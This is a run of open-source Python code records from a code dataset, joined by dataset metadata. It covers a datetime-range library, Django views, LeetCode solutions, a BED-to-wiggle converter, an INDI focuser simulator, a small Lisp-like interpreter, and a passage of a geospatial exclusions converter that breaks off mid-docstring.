parsed-literal::\n\n NaT - NaT\n NaT - 2015-03-22T10:10:00+0900\n \"\"\"\n\n if value is None:\n self.__end_datetime = None\n return\n\n try:\n self.__end_datetime = typepy.type.DateTime(\n value, strict_level=typepy.StrictLevel.MIN, timezone=timezone\n ).convert()\n except typepy.TypeConversionError as e:\n raise ValueError(e)\n\n def set_time_range(self, start, end):\n \"\"\"\n :param datetime.datetime/str start: |param_start_datetime|\n :param datetime.datetime/str end: |param_end_datetime|\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange()\n print(time_range)\n time_range.set_time_range(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range)\n :Output:\n .. parsed-literal::\n\n NaT - NaT\n 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900\n \"\"\"\n\n self.set_start_datetime(start)\n self.set_end_datetime(end)\n\n @staticmethod\n def __compare_relativedelta(lhs, rhs):\n if lhs.years < rhs.years:\n return -1\n if lhs.years > rhs.years:\n return 1\n\n if lhs.months < rhs.months:\n return -1\n if lhs.months > rhs.months:\n return 1\n\n if lhs.days < rhs.days:\n return -1\n if lhs.days > rhs.days:\n return 1\n\n if lhs.hours < rhs.hours:\n return -1\n if lhs.hours > rhs.hours:\n return 1\n\n if lhs.minutes < rhs.minutes:\n return -1\n if lhs.minutes > rhs.minutes:\n return 1\n\n if lhs.seconds < rhs.seconds:\n return -1\n if lhs.seconds > rhs.seconds:\n return 1\n\n if lhs.microseconds < rhs.microseconds:\n return -1\n if lhs.microseconds > rhs.microseconds:\n return 1\n\n return 0\n\n def __compare_timedelta(self, lhs, seconds):\n try:\n rhs = datetime.timedelta(seconds=seconds)\n\n if lhs < rhs:\n return -1\n if lhs > rhs:\n return 1\n\n return 0\n except TypeError:\n return self.__compare_relativedelta(\n lhs.normalized(), rdelta.relativedelta(seconds=seconds)\n )\n\n def range(self, step):\n \"\"\"\n Return an iterator object.\n\n :param step: Step of iteration.\n :type step: |timedelta|/dateutil.relativedelta.relativedelta\n :return: iterator\n :rtype: iterator\n\n :Sample Code:\n .. code:: python\n\n import datetime\n from datetimerange import DateTimeRange\n\n time_range = DateTimeRange(\"2015-01-01T00:00:00+0900\", \"2015-01-04T00:00:00+0900\")\n for value in time_range.range(datetime.timedelta(days=1)):\n print(value)\n :Output:\n .. parsed-literal::\n\n 2015-01-01 00:00:00+09:00\n 2015-01-02 00:00:00+09:00\n 2015-01-03 00:00:00+09:00\n 2015-01-04 00:00:00+09:00\n \"\"\"\n\n if self.__compare_timedelta(step, 0) == 0:\n raise ValueError(\"step must be not zero\")\n\n is_inversion = False\n try:\n self.validate_time_inversion()\n except ValueError:\n is_inversion = True\n\n if not is_inversion:\n if self.__compare_timedelta(step, seconds=0) < 0:\n raise ValueError(\"invalid step: expect greater than 0, actual={}\".format(step))\n else:\n if self.__compare_timedelta(step, seconds=0) > 0:\n raise ValueError(\"invalid step: expect less than 0, actual={}\".format(step))\n\n current_datetime = self.start_datetime\n while current_datetime <= self.end_datetime:\n yield current_datetime\n current_datetime = current_datetime + step\n\n def intersection(self, x):\n \"\"\"\n Newly set a time range that overlaps\n the input and the current time range.\n\n :param DateTimeRange x:\n Value to compute intersection with the current time range.\n\n :Sample Code:\n .. 
code:: python\n\n from datetimerange import DateTimeRange\n dtr0 = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n dtr1 = DateTimeRange(\"2015-03-22T10:05:00+0900\", \"2015-03-22T10:15:00+0900\")\n dtr0.intersection(dtr1)\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:05:00+0900 - 2015-03-22T10:10:00+0900\n \"\"\"\n\n self.validate_time_inversion()\n x.validate_time_inversion()\n\n if any([x.start_datetime in self, self.start_datetime in x]):\n start_datetime = max(self.start_datetime, x.start_datetime)\n end_datetime = min(self.end_datetime, x.end_datetime)\n else:\n start_datetime = None\n end_datetime = None\n\n return DateTimeRange(\n start_datetime=start_datetime,\n end_datetime=end_datetime,\n start_time_format=self.start_time_format,\n end_time_format=self.end_time_format,\n )\n\n def encompass(self, x):\n \"\"\"\n Newly set a time range that encompasses\n the input and the current time range.\n\n :param DateTimeRange x:\n Value to compute encompass with the current time range.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n dtr0 = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n dtr1 = DateTimeRange(\"2015-03-22T10:05:00+0900\", \"2015-03-22T10:15:00+0900\")\n dtr0.encompass(dtr1)\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:00:00+0900 - 2015-03-22T10:15:00+0900\n \"\"\"\n\n self.validate_time_inversion()\n x.validate_time_inversion()\n\n return DateTimeRange(\n start_datetime=min(self.start_datetime, x.start_datetime),\n end_datetime=max(self.end_datetime, x.end_datetime),\n start_time_format=self.start_time_format,\n end_time_format=self.end_time_format,\n )\n\n def truncate(self, percentage):\n \"\"\"\n Truncate ``percentage`` / 2 [%] of whole time from first and last time.\n\n :param float percentage: Percentage of truncate.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\n \"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.is_output_elapse = True\n print(time_range)\n time_range.truncate(10)\n print(time_range)\n :Output:\n .. 
parsed-literal::\n\n 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 (0:10:00)\n 2015-03-22T10:00:30+0900 - 2015-03-22T10:09:30+0900 (0:09:00)\n \"\"\"\n\n self.validate_time_inversion()\n\n if percentage < 0:\n raise ValueError(\"discard_percent must be greater or equal to zero: \" + str(percentage))\n\n if percentage == 0:\n return\n\n discard_time = self.timedelta // int(100) * int(percentage / 2)\n\n self.__start_datetime += discard_time\n self.__end_datetime -= discard_time\n\n def __validate_value(self, data_prop):\n if data_prop.typecode not in [typepy.Typecode.DATETIME, typepy.Typecode.NONE]:\n raise ValueError(\"invalid datetime value: {}\".format(data_prop))\n\n @staticmethod\n def __get_timedelta_sec(dt):\n return int(dt.days * 60 ** 2 * 24 + float(dt.seconds) + dt.microseconds / (1000.0 ** 2))\n","sub_path":"datetimerange/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":21766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"537945317","text":"from django.http import HttpRequest, HttpResponse\nfrom django.shortcuts import render\n\nfrom projects.api.views.files import ProjectsFilesViewSet\nfrom projects.api.views.snapshots import ProjectsSnapshotsViewSet\n\n\ndef list(request: HttpRequest, *args, **kwargs) -> HttpResponse:\n \"\"\"\n List snapshots for a project.\n \"\"\"\n viewset = ProjectsSnapshotsViewSet.init(\"list\", request, args, kwargs)\n project = viewset.get_project()\n snapshots = viewset.get_queryset(project)\n\n return render(\n request,\n \"projects/snapshots/list.html\",\n dict(project=project, snapshots=snapshots, meta=project.get_meta()),\n )\n\n\ndef retrieve(\n request: HttpRequest, *args, template=\"projects/snapshots/retrieve.html\", **kwargs\n) -> HttpResponse:\n \"\"\"\n Retrieve a snapshot of a project.\n \"\"\"\n snapshot_viewset = ProjectsSnapshotsViewSet.init(\"retrieve\", request, args, kwargs)\n project = snapshot_viewset.get_project()\n snapshot = snapshot_viewset.get_object(project=project)\n snapshot_context = snapshot_viewset.get_response_context(instance=snapshot)\n\n files_viewset = ProjectsFilesViewSet.init(\"list\", request, args, kwargs)\n files = files_viewset.get_queryset(project=project, snapshot=snapshot)\n files_context = files_viewset.get_response_context(queryset=files)\n\n return render(\n request,\n template,\n dict(**snapshot_context, **files_context, meta=project.get_meta()),\n )\n","sub_path":"manager/projects/ui/views/snapshots.py","file_name":"snapshots.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"201415025","text":"class Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n product = 0\n left = [1 for i in nums]\n output = [1 for i in nums]\n for i in range(1,len(nums)):\n left[i] = left[i-1]* nums[i-1] \n R = 1\n for i in range(len(nums)-1,-1,-1):\n output[i] = left[i]*R\n R = R*nums[i]\n return output\n","sub_path":"ProductOfArrayExceptSelf.py","file_name":"ProductOfArrayExceptSelf.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"216512807","text":"#self.myPow重复调了两次,一次就够了\n\nclass Solution:\n def myPow(self, x: float, n: int) -> float:\n if n == 1:\n return x\n if n == 0:\n return 1\n t = abs(n)\n res = self.myPow(x*x, int(t/2))\n if t%2:\n res = res * x\n if n < 0:\n return 1/res\n return res\n","sub_path":"Math 50. 
Pow(x, n).py","file_name":"Math 50. Pow(x, n).py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"203644419","text":"class BED:\r\n\t\r\n\tdef _init_(self):\r\n\t\tpass\r\n\r\n\tdef Readfile(self, filename):\r\n\t\thandle = open(filename,'r')\r\n\t\tmatrix_of_bed_file = []\r\n\t\tfor line in handle:\r\n\t\t\ttemp = line.strip().split('\\t')\r\n\t\t\ttemp2 = list(temp)\r\n\t\t\tmatrix_of_bed_file.append(temp2)\r\n\t\treturn matrix_of_bed_file\r\n\t\r\n\tdef ConvertBEDtoWiggle(self, BED):\r\n\t\ttotal = 0\r\n\t\twiggle_header = 'track type=wiggle_0\\nfixedStep chrom='\r\n\t\twiggle_matrix = []\r\n\t\tprevious_chromosome_name = 'null'\r\n\t\tfor line in BED:\r\n\t\t\tif(line[0] != previous_chromosome_name):\r\n\t\t\t\twiggle_matrix.append(wiggle_header+line[0]+'\\n')\r\n\t\t\t\tprevious_chromosome_name = line[0]\r\n\t\t\tstart = int(line[1])\r\n\t\t\tend = int(line[2])\r\n\t\t\tfor i in range(start,end):\r\n\t\t\t\twiggle_matrix.append(line[3])\r\n\t\t\t\ttotal += float(line[3])\r\n\t\treturn wiggle_matrix, round(total)","sub_path":"class_bed.py","file_name":"class_bed.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"639360117","text":"import threading\nimport time\n\nfrom indi.device import Driver\nfrom indi.device.pool import DevicePool\nfrom indi.device import properties\nfrom indi.message import const\n\n\n@DevicePool.register\nclass Focuser(Driver):\n name = 'FOCUSER_SIMULATOR'\n\n general = properties.Group(\n 'GENERAL',\n vectors=dict(\n connection=properties.Standard('CONNECTION', onchange='connect'),\n info=properties.TextVector(\n 'INFO',\n enabled=False,\n perm=const.Permissions.READ_ONLY,\n elements=dict(\n manufacturer=properties.Text('MANUFACTURER', default='Wiktor Latanowicz'),\n camera_model=properties.Text('FOCUSER_MODEL', default='FocuserSimulator'),\n )\n ),\n active_device=properties.Standard(\n 'ACTIVE_DEVICES',\n elements=dict(\n camera=properties.Text('ACTIVE_FOCUSER', default=name)\n )\n )\n )\n )\n\n position = properties.Group(\n 'POSITION',\n enabled=False,\n vectors=dict(\n position=properties.Standard('ABS_FOCUS_POSITION'),\n )\n )\n\n position.position.position.onwrite = 'reposition'\n\n def connect(self, sender):\n connected = self.general.connection.connect.bool_value\n self.position.enabled = connected\n self.general.info.enabled = connected\n\n def reposition(self, sender, value):\n def worker():\n step_size = 85\n delay = 1\n\n self.position.position.state_ = const.State.BUSY\n diff = float(value) - sender.value\n while abs(diff) > 0.1:\n dir = 1 if diff > 0 else -1\n step = dir * min(step_size, abs(diff))\n time.sleep(delay)\n sender.value = sender.value + step\n diff = float(value) - sender.value\n self.position.position.state_ = const.State.OK\n\n w = threading.Thread(target=worker, daemon=True)\n w.start()\n","sub_path":"telescopy_sims/devices/Focuser.py","file_name":"Focuser.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"473596417","text":"import collections\nimport functools\nimport argparse\nimport operator as op\nimport math\nimport time\nimport os\nimport re\n\n\nToken = collections.namedtuple('Token', ['typ', 'value', 'line', 'column'])\nkeywords = [\n \"function\", \"if\", \"while\"\n]\n\n\nclass ParseError(Exception):\n pass\n\n\nclass 
Procedure(object):\n def __init__(self, params, body, envi):\n self.params, self.body, self.env = params, body, envi\n self.params = [p.value for p in self.params]\n\n def __call__(self, *args):\n return evaluate(self.body, Env(self.params, args, outer=self.env))\n\n\nclass Env(dict):\n def __init__(self, parms=(), args=(), outer=None):\n super().__init__(self)\n self.update(zip(parms, args))\n self.outer = outer\n\n def __xor__(self, other):\n new = Env()\n for key in other:\n if key not in self:\n new[key] = other[key]\n return new\n\n def __and__(self, other):\n new = Env()\n for key in other:\n if key in self and key in other:\n new[key] = self[key]\n return new\n\n def __getitem__(self, var):\n return dict.__getitem__(self, var) if var in self else None\n\n def find(self, var):\n if var in self:\n return self[var]\n elif self.outer is not None:\n return self.outer.find(var)\n else:\n return None\n\n\ndef print_r(array, i=0):\n for elem in array:\n if not isinstance(elem, list):\n print(\"\\t\" * i + str(elem))\n else:\n print_r(elem, i + 1)\n\n\ndef require(cond, error):\n if not cond:\n raise error\n\n\ndef atom(tok):\n if tok.value == 'true':\n value = True\n elif tok.value == 'false':\n value = False\n try:\n value = int(tok.value)\n except ValueError:\n try:\n value = float(tok.value)\n except ValueError:\n try:\n value = complex(tok.value.replace('i', 'j', 1))\n except ValueError:\n value = str(tok.value)\n return Token(tok.typ, value, tok.line, tok.column)\n\n\ndef mtoa(*tokens):\n work = \"\"\n for tok in tokens:\n if work:\n work += \" \"\n if tok == True and isinstance(tok, bool):\n work += 'true'\n elif tok == False and isinstance(tok, bool):\n work += 'true'\n elif isinstance(tok, list):\n work += '(' + ' '.join(map(mtoa, tok)) + ')'\n elif isinstance(tok, complex):\n work += tok.replace('j', 'i')\n else:\n work += str(tok)\n return work\n\n\ndef standard_env():\n _env = Env()\n _env.update(vars(math))\n _env.update({\n # maths\n '+': op.add, '-': op.sub,\n '*': op.mul, '/': op.truediv,\n '//': op.floordiv, '%': op.mod,\n '**': lambda a, b: a ** b,\n\n # binaires\n '^': op.xor, '|': op.or_,\n '~': lambda a: ~a, '&': op.and_,\n 'rshift': lambda a, b: a >> b, 'lshift': lambda a, b: a << b,\n\n # Conditions\n '>': op.gt, '<': op.lt, '>=': op.ge,\n '<=': op.le, '!=': op.ne, '==': op.eq,\n '!': lambda a: not a,\n\n # listes\n '@': op.getitem, '@=': op.setitem, '@~': op.delitem, 'length': len,\n 'list': lambda *x: list(x), 'list?': lambda x: isinstance(x, list),\n '@@': lambda *x: x[1:],\n 'cons': lambda x, y: [x] + y if not isinstance(x, list) and isinstance(y, list) else x + [y],\n\n # autres\n 'time': time.time, 'round': round, 'abs': abs, 'zip': lambda *x: list(zip(*x)),\n 'map': lambda *x: list(map(*x)), 'max': max, 'min': min, \"print\": lambda *x: print(mtoa(*x)),\n\n # fichiers\n 'open-input-file': open, 'open-output-file': lambda f: open(f, 'w'), 'close-file': lambda f: f.close(),\n 'read-file': lambda f: f.read(), 'write-in-file': lambda f, s: f.write(s),\n\n # types\n 'int': lambda x: int(x), 'float': lambda x: float(x), 'number?': lambda x: isinstance(x, (int, float)),\n 'bool': lambda x: bool(x), 'bool?': lambda x: isinstance(x, bool),\n 'str': lambda x: str(x), 'str?': lambda x: isinstance(x, str),\n })\n return _env\n\n\ndef tokenize(code):\n token_specification = [\n ('PARAMETER', r':[A-Za-z_][A-Za-z0-9_\\?\\-]*'), # function parameter\n ('NUMBER', r'\\d+(\\.\\d*)?'), # Integer or decimal number\n ('STRING', r'[\\'\"]{1}.*[\\'\"]{1}'), # String\n ('ASSIGN', r'='), 
# Assignment operator\n ('CALL', r'<<'),\n ('BLOC_START', r'\\('), ('BLOC_END', r'\\)'), # Blocs\n # ('SEPARATOR', r','), # Argument separator\n # ('END', r';'), # Statement terminator\n ('ARRAY_START', r'\\['), ('ARRAY_END', r'\\]'), # Array\n ('COMMENT', r'#.*'), # Comment\n ('ID', r'[A-Za-z_][A-Za-z0-9_\\?\\-]*'), # Identifiers\n ('BOOL', r'(true|false)'), # Boolean\n ('OP', r'(\\+|-|\\*|/|%|\\*\\*|@|@=|@~)'), # Arithmetic operators\n ('BINARYOP', r'(\\&|\\^|\\|rshift|lshift)'), # Binary operators\n ('COND', r'(<|>|==|<=|>=|!=|!)'), # Conditionnals operators\n ('NEWLINE', r'(\\n|\\r|\\r\\n)'), # Line endings\n ('SKIP', r'[ \\t]+'), # Skip over spaces and tabs\n ('MISMATCH', r'.'), # Any other character\n ]\n tok_regex = '|'.join('(?P<%s>%s)' % pair for pair in token_specification)\n line_num = 1\n line_start = 0\n\n for mo in re.finditer(tok_regex, code):\n kind = mo.lastgroup\n value = mo.group(kind)\n\n if kind == 'MISMATCH':\n raise RuntimeError('%r unexpected on line %d' % (value, line_num))\n elif kind == 'NEWLINE':\n line_start = mo.end()\n line_num += 1\n elif kind == 'SKIP' or kind == 'COMMENT':\n pass\n else:\n if kind == 'ID' and value in keywords:\n kind = 'kwtype'\n if kind == 'STRING':\n value = value[1:-1]\n if kind == 'NUMBER':\n try:\n value = int(value)\n except ValueError:\n value = float(value)\n\n column = mo.start() - line_start\n yield Token(kind, value, line_num, column)\n\n\ndef parse(context, tokens):\n token = tokens.pop(0) # on enlève le premier token qui doit etre un '('\n require(token.typ != 'BLOC_END',\n SyntaxError(\"Unexpected '%s', line: %i, column: %i (instead of '(')\\n%s\" % (token.value, token.line, token.column, context[token.line - 1])))\n\n if token.typ == 'ARRAY_START':\n array = []\n while tokens[0].typ != 'ARRAY_END':\n val = parse(context, tokens)\n if val is not None:\n array.append(val)\n tok_array = Token('ARRAY', [t.value for t in array], token.line, token.column)\n last = tokens.pop(0) # on enlève le dernier token qui doit être un ']'\n line = \"%s\\n\" % context[last.line - 1]\n line += \" \" * last.column + \"^\" * len(last.value) + \"\\n\"\n require(last.typ == 'ARRAY_END',\n SyntaxError(\"Expected ']'\\n\" + line))\n return tok_array\n elif token.typ == 'BLOC_START':\n ast = []\n while tokens[0].typ != 'BLOC_END':\n val = parse(context, tokens)\n if val is not None:\n ast.append(val)\n last = tokens.pop(0) # on enlève le dernier token qui doit être un ')'\n line = \"%s\\n\" % context[last.line - 1]\n line += \" \" * last.column + \"^\" * len(last.value) + \"\\n\"\n require(last.typ == 'BLOC_END',\n SyntaxError(\"Expected ')'\\n\" + line))\n return ast\n else:\n return atom(token)\n\n\ndef evaluate(parsed_line, env):\n if parsed_line[0].typ == 'PARAMETER':\n return env.find(parsed_line[0].value)\n if parsed_line[0].typ == 'ID':\n if len(parsed_line) > 1:\n if parsed_line[1].typ == 'ASSIGN':\n env[parsed_line[0].value] = evaluate(parsed_line[2:], env)\n return None\n if parsed_line[1].typ == 'CALL':\n require(parsed_line[0].value in env,\n RuntimeError(\"'%s' does not exist, line: %i\" % (parsed_line[0].value, parsed_line[0].line)))\n exprs = [evaluate([bloc], env) for bloc in parsed_line[2:]]\n return env.find(parsed_line[0].value)(*exprs)\n return env.find(parsed_line[0].value)\n if len(parsed_line) > 1 and isinstance(parsed_line[1], Token) and parsed_line[1].typ in ('OP', 'BINARYOP', 'COND'):\n require(len(parsed_line) >= 3,\n ValueError(\"Missing arguments for %s, line: %i\" % (parsed_line[1].value, parsed_line[1].line)))\n 
operandes = [evaluate([e], env) for e in [parsed_line[0]] + parsed_line[2:]]\n print(operandes)\n return functools.reduce(env.find(parsed_line[1].value), operandes)\n if parsed_line[0].typ == 'kwtype':\n if parsed_line[0].value == 'function':\n for supposed_arg in parsed_line[1:-1]:\n require(supposed_arg.typ == 'PARAMETER',\n SyntaxError(\"'%s' should be a parameter, not '%s'. Line: %i\" % (supposed_arg.value, supposed_arg.typ, supposed_arg.line)))\n return Procedure(parsed_line[1:-1], parsed_line[-1], env)\n if parsed_line[0].value == 'if':\n require(len(parsed_line) >= 3,\n SyntaxError(\"Missing a part of the expression. Line: %i\" % parsed_line[0].line))\n cond = evaluate(parsed_line[1], env)\n if cond:\n return evaluate(parsed_line[2], env)\n else:\n if len(parsed_line == 4):\n return evaluate(parsed_line[3], env)\n return None\n if parsed_line[0].value == 'while':\n require(len(parsed_line) >= 3,\n SyntaxError(\"Missing a part of the expression. Line: %i\" % parsed_line[0].line))\n while evaluate(parsed_line[1], env):\n for expr in parsed_line[2:]:\n evaluate(expr, env)\n return None\n if parsed_line[0].typ in ('NUMBER', 'STRING', 'BOOL', 'ARRAY'):\n return parsed_line[0].value\n return None\n\n\narg_parser = argparse.ArgumentParser(\n\tprog='seventh.py',\n\tdescription=\"Tokenize, parse, and execute the given input file\"\n)\narg_parser.add_argument('path', metavar='PATH', help='the input file')\narg_parser.add_argument('-l', '--lex', dest='lex', action='store_true',\n \t\thelp='tokenize the given input file')\narg_parser.add_argument('-a', '--ast', dest='ast', action='store_true',\n \t\thelp='parse the given input file')\narg_parser.add_argument('-e', '--execute', dest='exe', action='store_true',\n help='execute the given input file')\narg_parser.add_argument('-c', '--compile', dest='comp', action='store_true',\n help='compile the given input file into Python AST')\narg_parser.add_argument('-i', '--interpreter', dest='repl', action='store_true',\n help='start an interpreter')\n\n\ndef main(path=\"\", lex=False, ast=False, exe=False, comp=False, repl=False):\n path = os.path.abspath(path)\n\n try:\n with open(path, \"r\", encoding=\"utf-8\") as file:\n content = file.readlines()\n except Exception as exc:\n if not repl:\n raise RuntimeError(\"Unable to find '%s'\" % path) from exc\n\n if ast or comp:\n lex = True\n if exe:\n lex = True\n ast = True\n\n tokens = None\n parsed = None\n\n if lex:\n tokens = [[tok for tok in tokenize(line)] for line in content]\n if not ast and not comp: print_r(tokens)\n if comp:\n raise NotImplementedError(\"Unable to compile, functionality is not implemented for the moment\")\n if ast:\n parsed = [p for p in [parse(content, toks) for toks in tokens if toks is not None and toks != []] if p is not None and p != []]\n if not exe: print_r(parsed)\n if repl:\n env = standard_env()\n while True:\n code = input('> ')\n try:\n val = evaluate(code, env)\n if val:\n print(mtoa(val))\n except Exception as exc:\n print(exc)\n if exe:\n env = standard_env()\n for line in parsed:\n val = evaluate(line, env)\n if val:\n print(mtoa(val))\n\n\nif __name__ == '__main__':\n args = arg_parser.parse_args()\n main(**args.__dict__)\n","sub_path":"seventh.py","file_name":"seventh.py","file_ext":"py","file_size_in_byte":12419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"315207381","text":"# -*- coding: utf-8 -*-\n\"\"\"\nHandler to convert exclusion to/from .h5 and .geotiff\n\"\"\"\nimport h5py\nimport json\nimport 
logging\nimport numpy as np\nimport os\nfrom pyproj.crs import CRS\nimport rasterio\nfrom warnings import warn\n\nfrom reV.handlers.exclusions import ExclusionLayers\nfrom reV.handlers.outputs import Outputs\n\nfrom reVX.handlers.geotiff import Geotiff\nfrom reVX.utilities.exceptions import ExclusionsCheckError\nfrom reVX.utilities.utilities import log_versions\n\nlogger = logging.getLogger(__name__)\n\n\nclass ExclusionsConverter:\n \"\"\"\n Convert exclusion layers between .h5 and .tif (geotiff)\n \"\"\"\n def __init__(self, excl_h5, hsds=False, chunks=(128, 128), replace=True):\n \"\"\"\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing or to contain exclusion layers\n hsds : bool, optional\n Boolean flag to use h5pyd to handle .h5 'files' hosted on AWS\n behind HSDS, by default False\n chunks : tuple, optional\n Chunk size of exclusions in .h5 and Geotiffs, by default (128, 128)\n replace : bool, optional\n Flag to replace existing layers if needed, by default True\n \"\"\"\n log_versions(logger)\n self._excl_h5 = excl_h5\n self._hsds = hsds\n self._chunks = chunks\n self._replace = replace\n\n def __repr__(self):\n msg = \"{} for {}\".format(self.__class__.__name__, self._excl_h5)\n return msg\n\n def __getitem__(self, layer):\n \"\"\"\n Parameters\n ----------\n layer : str\n Layer to extract data for\n\n Returns\n -------\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n \"\"\"\n\n if layer not in self.layers:\n msg = \"{} is not present in {}\".format(layer, self._excl_h5)\n logger.error(msg)\n raise KeyError(msg)\n\n profile, values = self._extract_layer(self._excl_h5, layer,\n hsds=self._hsds)\n return profile, values\n\n def __setitem__(self, layer, geotiff):\n \"\"\"\n Parameters\n ----------\n layer : str\n Layer to set\n geotiff : str\n Path to GeoTiff to load data from\n \"\"\"\n self.geotiff_to_layer(layer, geotiff)\n\n @property\n def layers(self):\n \"\"\"\n Available exclusion layers in .h5 file\n\n Returns\n -------\n layers : list\n Available layers in .h5 file\n \"\"\"\n with ExclusionLayers(self._excl_h5, hsds=self._hsds) as exc:\n layers = exc.layers\n\n return layers\n\n @staticmethod\n def _init_h5(excl_h5, geotiff, chunks=(128, 128)):\n \"\"\"\n Initialize exclusions .h5 file from geotiff:\n - Transfer profile, shape, and meta\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n geotiff : str\n Path to geotiff file\n chunks : tuple\n Chunk size of exclusions in Geotiff\n \"\"\"\n logger.debug('\\t- Initializing {} from {}'\n .format(excl_h5, geotiff))\n with Geotiff(geotiff, chunks=chunks) as src:\n profile = src.profile\n shape = src.shape\n lat, lon = src.lat_lon\n logger.debug('\\t- \"profile\", \"meta\", and \"shape\" extracted from {}'\n .format(geotiff))\n\n try:\n with h5py.File(excl_h5, mode='w') as dst:\n dst.attrs['profile'] = json.dumps(profile)\n logger.debug('\\t- Default profile:\\n{}'.format(profile))\n dst.attrs['shape'] = shape\n logger.debug('\\t- Default shape:\\n{}'.format(shape))\n dst.attrs['chunks'] = chunks\n logger.debug('\\t- Default chunks:\\n{}'.format(chunks))\n\n dst.create_dataset('latitude', shape=lat.shape,\n dtype=np.float32, data=lat,\n chunks=chunks)\n logger.debug('\\t- latitude coordiantes created')\n\n dst.create_dataset('longitude', shape=lon.shape,\n dtype=np.float32, data=lon,\n chunks=chunks)\n logger.debug('\\t- longitude coordiantes created')\n except Exception:\n logger.exception(\"Error initilizing {}\".format(excl_h5))\n 
if os.path.exists(excl_h5):\n os.remove(excl_h5)\n\n @staticmethod\n def _check_crs(baseline_crs, test_crs, ignore_keys=('no_defs',)):\n \"\"\"\n Compare baseline and test crs values\n\n Parameters\n ----------\n baseline_crs : dict\n Baseline CRS to use a truth, must be a dict\n test_crs : dict\n Test CRS to compare with baseline, must be a dictionary\n ignore_keys : tuple\n Keys to not check\n\n Returns\n -------\n bad_crs : bool\n Flag if crs' do not match\n \"\"\"\n bad_crs = False\n for k, true_v in baseline_crs.items():\n if k not in ignore_keys:\n test_v = test_crs.get(k, true_v)\n if true_v != test_v:\n bad_crs = True\n\n return bad_crs\n\n @classmethod\n def _check_geotiff(cls, excl_h5, geotiff, chunks=(128, 128),\n transform_atol=0.01, coord_atol=0.001):\n \"\"\"\n Compare geotiff with exclusion layer, raise any errors\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n geotiff : str\n Path to geotiff file\n chunks : tuple\n Chunk size of exclusions in Geotiff\n transform_atol : float\n Absolute tolerance parameter when comparing geotiff transform data.\n coord_atol : float\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates.\n \"\"\"\n with Geotiff(geotiff, chunks=chunks) as tif:\n with ExclusionLayers(excl_h5) as h5:\n if tif.bands > 1:\n error = ('{} contains more than one band!'\n .format(geotiff))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n if not np.array_equal(h5.shape, tif.shape):\n error = ('Shape of exclusion data in {} and {} do not '\n 'match!'.format(geotiff, excl_h5))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n profile = h5.profile\n h5_crs = CRS.from_string(profile['crs']).to_dict()\n tif_crs = CRS.from_string(tif.profile['crs']).to_dict()\n bad_crs = cls._check_crs(h5_crs, tif_crs)\n if bad_crs:\n error = ('Geospatial \"crs\" in {} and {} do not match!'\n '\\n {} !=\\n {}'\n .format(geotiff, excl_h5, tif_crs, h5_crs))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n if not np.allclose(profile['transform'],\n tif.profile['transform'],\n atol=transform_atol):\n error = ('Geospatial \"transform\" in {} and {} do not '\n 'match!\\n {} !=\\n {}'\n .format(geotiff, excl_h5, profile['transform'],\n tif.profile['transform']))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n lat, lon = tif.lat_lon\n if not np.allclose(h5.latitude, lat, atol=coord_atol):\n error = ('Latitude coordinates {} and {} do not match to '\n 'within {} degrees!'\n .format(geotiff, excl_h5, coord_atol))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n if not np.allclose(h5.longitude, lon, atol=coord_atol):\n error = ('Longitude coordinates {} and {} do not match to '\n 'within {} degrees!'\n .format(geotiff, excl_h5, coord_atol))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n @classmethod\n def _parse_tiff(cls, geotiff, excl_h5=None, chunks=(128, 128),\n check_tiff=True, transform_atol=0.01, coord_atol=0.001):\n \"\"\"\n Extract exclusion layer from given geotiff, compare with excl_h5\n if provided\n\n Parameters\n ----------\n geotiff : str\n Path to geotiff file\n excl_h5 : str, optional\n Path to .h5 file containing exclusion layers, by default None\n chunks : tuple, optional\n Chunk size of exclusions in Geotiff, by default (128, 128)\n check_tiff : bool, optional\n Flag to check tiff profile and coordinates against exclusion .h5\n profile and coordinates, by default True\n transform_atol : float, 
